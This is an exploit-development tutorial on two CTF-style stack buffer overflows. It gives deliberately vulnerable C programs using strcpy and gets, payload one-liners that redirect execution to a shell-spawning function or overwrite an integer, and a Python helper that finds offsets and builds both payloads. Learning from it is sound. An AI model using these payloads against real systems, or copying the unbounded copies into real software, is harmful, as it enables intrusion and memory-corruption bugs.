
Easy - No Protections


Last updated 1 year ago

## Simple Buffer Overflow (no protection) - Function call

### Code

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void earth_destroy(void);
void earth_alive(void);

/* Vulnerable: strcpy() copies argv[1] into a 50-byte stack buffer with no length check. */
void copy_ordre(char *arg) {
    char ordre[50];
    strcpy(ordre, arg);
    printf("Order received: %s\n", ordre);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        printf("Welcome, human. Give us your orders. If your answer is correct, we will spare you. Otherwise, we will destroy the Earth.");
        printf("Usage: %s <ordre>", argv[0]);
        exit(0);
    }
    printf("Welcome, human. Give us your orders. If your answer is correct, we will spare you. Otherwise, we will destroy the Earth.");
    copy_ordre(argv[1]);
    earth_destroy();   /* normal control flow never reaches earth_alive() */
    return 0;
}

void earth_destroy(void) {
    printf("Wrong answer! We will destroy your planet in a few minutes.");
}

/* Never called by the program: this is the function the overflow redirects to. */
void earth_alive(void) {
    printf("We admit defeat. You have won, we give you back the Earth!");
    execve("/bin/sh", NULL, NULL);
}
```

### Explanations and exploit

- The goal is to call `earth_alive()`, which the program never calls on its own.
- `ordre` is 50 bytes long and `strcpy()` does not check the length, so anything beyond 50 bytes overwrites what the compiler placed above the buffer on the stack: first padding and the saved EBP, then the saved return address (the value that `ret` loads into EIP when `copy_ordre()` returns).
- On this binary the saved return address starts 62 bytes from the beginning of the buffer (50 bytes of buffer plus 12 bytes of padding and saved EBP). That offset depends on the compiler's stack layout, so measure it on your own build (overflow with a cyclic pattern under gdb and see which four bytes land in EIP) instead of assuming it.
- The payload is therefore 62 filler bytes followed by the address of `earth_alive()` in little-endian order. This only works because the binary is 32-bit, non-PIE (the address is a fixed `0x0804xxxx`) and has no stack canary; a canary would be detected before `ret`, and under PIE the address would have to be leaked first. A build of this kind is obtained with something like `gcc -m32 -fno-stack-protector -no-pie`.
- Get the address with `nm`:

```
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive
```

- `0x08048acb` contains no NUL byte, which matters here: the payload travels through `argv` and `strcpy()`, and both stop at the first NUL. The Python 3 equivalent of the original one-liner writes raw bytes rather than a printed string:

```
$ ./pwn1 "$(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*62 + b"\xcb\x8a\x04\x08")')"
```

## Simple BoF - Int override

### Code

```c
#include <stdio.h>
#include <unistd.h>

int main(void) {
    char buf[20];
    int x = 0;
    gets(buf);                      /* no bound: reads until newline or EOF, NUL bytes included */
    if (x == 1234) {
        // gid_t gid = getegid();
        // setresgid(gid, gid, gid);
        FILE *fp = fopen("flag.txt", "r");
        char flag[64];
        if (fp != NULL && fgets(flag, 64, fp) != NULL)
            printf("Oh, a flag: %s", flag);
    }
    printf("x value : %d", x);
    return 0;
}
```

`gets()` was removed from C11, so build this with an older standard, for example `gcc -m32 -std=gnu99 -fno-stack-protector -no-pie`.

### Exploitation and explanations

- The goal is to overwrite `x` so that the `x == 1234` branch runs. `gets()` has no bound, so the input overflows `buf` into whatever lies above it on the stack.
- On this binary `x` starts 24 bytes after the beginning of `buf`: the 20-byte buffer plus 4 bytes of padding the compiler inserted (the original text calls these 4 bytes a pointer to the buffer, but they are simply the layout the compiler chose). Offsets vary between builds; here the easiest check is the `x value : %d` the program prints, which changes as soon as the padding reaches `x`.
- 1234 is `0x4d2`, which little-endian is `\xd2\x04\x00\x00`. Unlike the `argv` case, the payload arrives on stdin and `gets()` only stops at a newline, so NUL bytes are allowed.

```
$ python3 -c 'import sys; sys.stdout.buffer.write(b"a"*24 + b"\xd2\x04\x00\x00\n")' | ./pwn0
$ python3 -c 'import sys; sys.stdout.buffer.write(b"a"*24 + b"\xd2\x04\n")' | ./pwn0
$ python3 -c 'import sys; sys.stdout.buffer.write(b"a"*22 + b"\x00\x00\xd2\x04\n")' | ./pwn0
```

- All three set `x` to 1234. The second relies on `x` having been initialised to 0: only the two low bytes are written, the NUL that `gets()` appends lands on the third byte, and the fourth is still zero. The third writes its two zero bytes into the padding before `x` instead, with the same result.
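The following is an added example, not code from the original page or from the challenge binaries it describes. It packages the two steps both exploits above rely on: measuring the distance from the buffer to the overwritten value with a cyclic pattern (instead of guessing 62 or 24), and packing a 32-bit value little-endian behind the padding, both for the ret2func case (`pwn1`, offset 62, `earth_alive()` at 0x08048acb as reported above) and for the integer override (`pwn0`, offset 24, value 1234). The offsets and address are the page's own; the function names, the `via_argv` NUL-byte check and the command-line interface are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Added example (not from the original page): offset finding and payload
packing for the two overflows above.  Offsets 62 and 24 and the address
0x08048acb are the values the page reports; on another build, re-measure
them with pattern_create()/pattern_offset() before trusting them."""
import string
import struct
import sys


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is
    unique within the first 20280 bytes, so whatever lands in EIP at the crash
    identifies exactly how far into the input the return address sits."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte unique range of the pattern")


def pattern_offset(pattern: bytes, crash_eip: int) -> int:
    """Given the EIP value gdb shows at the crash (e.g. 0x41326141), return the
    offset of those four bytes inside the pattern, or -1 if they are not in it.
    The register holds the bytes little-endian, hence the '<I' unpacking."""
    return pattern.find(struct.pack("<I", crash_eip))


def ret2func_payload(offset: int, addr: int, via_argv: bool = False) -> bytes:
    """Padding up to the saved return address, then the 32-bit little-endian
    address of the function to jump to (ret2func, as in the pwn1 example).
    When the payload goes through argv and strcpy(), a NUL byte inside the
    address would truncate it, so that case is rejected up front."""
    packed = struct.pack("<I", addr)
    if via_argv and b"\x00" in packed:
        raise ValueError("address contains a NUL byte and cannot be passed via argv/strcpy")
    return b"A" * offset + packed


def int_override_payload(offset: int, value: int) -> bytes:
    """Padding up to the target integer, then its little-endian encoding (the
    pwn0 example).  Delivered on stdin to gets(), so NUL bytes are fine."""
    return b"a" * offset + struct.pack("<I", value)


if __name__ == "__main__":
    # Hypothetical CLI for this example:
    #   ./pwn1 "$(python3 bof.py pattern 100)"   -> crash under gdb, note EIP
    #   python3 bof.py offset 0x41326141          -> prints the offset found
    #   ./pwn1 "$(python3 bof.py pwn1)"
    #   python3 bof.py pwn0 | ./pwn0
    cmd = sys.argv[1] if len(sys.argv) > 1 else ""
    if cmd == "pattern":
        sys.stdout.buffer.write(pattern_create(int(sys.argv[2])))
    elif cmd == "offset":
        print(pattern_offset(pattern_create(20280), int(sys.argv[2], 16)))
    elif cmd == "pwn1":
        sys.stdout.buffer.write(ret2func_payload(62, 0x08048ACB, via_argv=True))
    elif cmd == "pwn0":
        sys.stdout.buffer.write(int_override_payload(24, 1234) + b"\n")
    else:
        sys.exit("usage: bof.py pattern <len> | offset <hex eip> | pwn1 | pwn0")
```

The `offset` step is the one that makes the numbers on this page reproducible: with a different compiler or flags the padding between the buffer and the overwritten value changes, but the pattern tells you the new offset from a single crash.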
